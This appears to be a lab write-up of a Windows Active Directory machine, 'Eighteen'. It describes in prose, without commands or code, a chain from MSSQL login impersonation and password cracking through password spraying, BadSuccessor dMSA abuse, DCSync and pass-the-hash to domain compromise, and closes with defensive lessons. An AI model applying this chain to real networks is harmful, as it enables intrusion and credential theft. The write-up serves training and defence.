Difficulty: Medium
Operating System: Windows

Executive Summary

Eighteen is a Windows Active Directory machine that combines database misconfigurations, password reuse, and modern Active Directory abuse techniques to achieve full domain compromise.

The attack begins with access to a Microsoft SQL Server instance, progresses through credential recovery and password reuse, and ultimately leverages the BadSuccessor technique to abuse delegated Managed Service Accounts (dMSA), resulting in Domain Administrator privileges.

Attack Path

MSSQL Access (kevin)
    → Login Impersonation (appdev)
    → Financial Planner Database
    → PBKDF2 Credential Recovery
    → Password Reuse
    → WinRM Access (adam.scott)
    → BadSuccessor (dMSA Abuse)
    → Kerberos Impersonation
    → DCSync
    → Domain Administrator

Reconnaissance

Service Enumeration

Initial enumeration revealed a limited attack surface:

  • Kerberos (88)
  • Microsoft SQL Server (1433)

Further service identification confirmed:

  • Microsoft SQL Server 2022
  • Windows Server 2025 Build 26100

The exposed SQL Server immediately became the primary attack vector.

Initial Access

MSSQL Enumeration

Valid credentials were available for the SQL Server instance.

After authentication, database enumeration revealed a custom database named:

financial_planner

Although direct access was initially restricted, further enumeration identified an interesting privilege assignment.

Login Impersonation

The user kevin possessed the ability to impersonate another SQL login:

appdev

By abusing SQL Server impersonation privileges, access to the financial_planner database became possible.

This demonstrates a common issue in enterprise environments where delegated permissions unintentionally expose sensitive data.

Credential Recovery

Database Analysis

Reviewing the application’s database revealed a user table containing authentication data.

A PBKDF2-SHA256 password hash belonging to the administrative application account was recovered.

Password Cracking

The recovered hash used:

  • PBKDF2-SHA256
  • 600,000 iterations

While the hashing algorithm was properly configured, the underlying password remained weak and susceptible to dictionary attacks.

Hashcat successfully recovered:

iloveyou1

Why This Matters

This compromise was not caused by weak cryptography.

Instead, it highlights how password reuse and poor password selection can completely undermine otherwise strong security controls.

User Access

Password Reuse

At this stage, the recovered password was tested against discovered domain users.

Password spraying identified valid credentials for:

adam.scott

The recovered credentials provided access through WinRM.

WinRM Access

Successful authentication granted an interactive shell as a standard domain user.

This established the first foothold within Active Directory and allowed deeper enumeration of the environment.

Privilege Escalation

Active Directory Enumeration

Host and domain enumeration identified several important findings:

  • Windows Server 2025
  • Membership in the IT group
  • CreateChild permissions on the Staff OU
  • Delegation-related Active Directory configurations

While none of these findings were immediately exploitable on their own, they formed the foundation of the eventual escalation path.

Understanding BadSuccessor

One of the most interesting aspects of Eighteen is the use of the BadSuccessor technique.

BadSuccessor targets delegated Managed Service Accounts (dMSA), a feature introduced to simplify service account management.

The attack abuses the relationship between:

  • dMSA objects
  • Delegation configuration
  • Privileged Active Directory principals

When combined with specific OU permissions, it becomes possible to create a delegated account capable of impersonating privileged users.

Exploiting BadSuccessor

Because the IT group possessed CreateChild permissions on the Staff organizational unit, a new dMSA object could be created.

The malicious dMSA was configured to reference the built-in Administrator account through the delegated account relationship.

As a result:

  1. A new dMSA was created.
  2. Delegation attributes were configured.
  3. Administrator became the effective delegation target.
  4. The attacker gained the ability to impersonate the privileged account.

This transformed a low-privileged user into an identity capable of performing administrative actions within the domain.

Domain Compromise

Kerberos Impersonation

Once the dMSA relationship was established, Kerberos ticket requests were used to impersonate the delegated account.

This process generated credentials associated with the privileged context.

The resulting ticket exposed authentication material linked to the Administrator account.

DCSync

With sufficient privileges established, a DCSync attack became possible.

DCSync abuses Active Directory replication functionality to request password data directly from a Domain Controller.

Rather than attacking the controller itself, the attacker convinces Active Directory that they are a legitimate replication partner.

This allowed extraction of:

  • NTLM hashes
  • Kerberos keys
  • Administrator credentials

Administrator Access

The recovered Administrator NTLM hash was used for Pass-the-Hash authentication.

This provided full administrative access to the domain and completed the compromise.

Lessons Learned

MSSQL Impersonation

SQL Server impersonation permissions should be reviewed carefully.

Excessive delegation frequently exposes sensitive databases and application secrets.

Password Reuse

Strong hashing algorithms cannot compensate for weak or reused passwords.

Organizations should enforce unique credentials and password manager adoption.

Active Directory Delegation

CreateChild permissions on organizational units can be significantly more dangerous than they appear.

Permissions should be audited regularly and granted only when operationally necessary.

BadSuccessor and dMSA Security

Organizations deploying Windows Server 2025 should review:

  • dMSA configurations
  • Delegation relationships
  • Administrative inheritance chains

Misconfigurations can create unexpected privilege escalation paths.

DCSync Detection

Domain replication privileges should be monitored closely.

Unexpected replication activity often indicates an ongoing compromise of Active Directory.

Conclusion

Eighteen is an excellent example of a modern Active Directory attack chain.

The compromise does not rely on a single critical vulnerability. Instead, it demonstrates how multiple seemingly minor weaknesses can be combined to achieve full domain compromise.

The machine highlights several important concepts:

  • SQL Server impersonation abuse
  • Password reuse risks
  • Active Directory delegation
  • BadSuccessor and dMSA exploitation
  • Kerberos abuse
  • DCSync attacks

For defenders, Eighteen reinforces the importance of permission auditing, credential hygiene, and continuous monitoring of Active Directory environments.